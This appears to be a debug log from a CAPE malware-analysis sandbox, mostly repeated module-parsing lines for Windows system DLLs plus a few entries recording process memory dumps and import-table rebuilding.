2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,663 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,694 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,772 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,788 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:36,849 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:36,849 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:36,849 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:36,865 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:36,865 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:36,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:36,865 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:36,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:36,881 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00B90000
2020-03-24 10:13:36,881 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00B91BCA
2020-03-24 10:13:36,881 [root] DEBUG: Module image dump success
2020-03-24 10:13:36,881 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xb90ffc, size: 0x1ec
2020-03-24 10:13:36,897 [root] DEBUG: IAT parsing finished, found 116 valid APIs, missed 0 APIs
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:36,897 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:13:36,911 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:36,911 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:36,911 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:36,911 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:36,927 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2192_4842881636132024232020
2020-03-24 10:13:36,959 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2192.dmp.
2020-03-24 10:13:36,959 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:36,959 [root] INFO: Notified of termination of process with pid 2192.
2020-03-24 10:13:36,974 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1340
2020-03-24 10:13:36,974 [root] DEBUG: GetHookCallerBase: thread 2288 (handle 0x0), return address 0x4A1A7302, allocation base 0x4A1A0000.
2020-03-24 10:13:36,974 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1340.dmp.
2020-03-24 10:13:37,006 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4A1A0000.
2020-03-24 10:13:37,006 [root] DEBUG: ApiReader: module list size: 20
2020-03-24 10:13:37,006 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,022 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,084 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,099 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,209 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
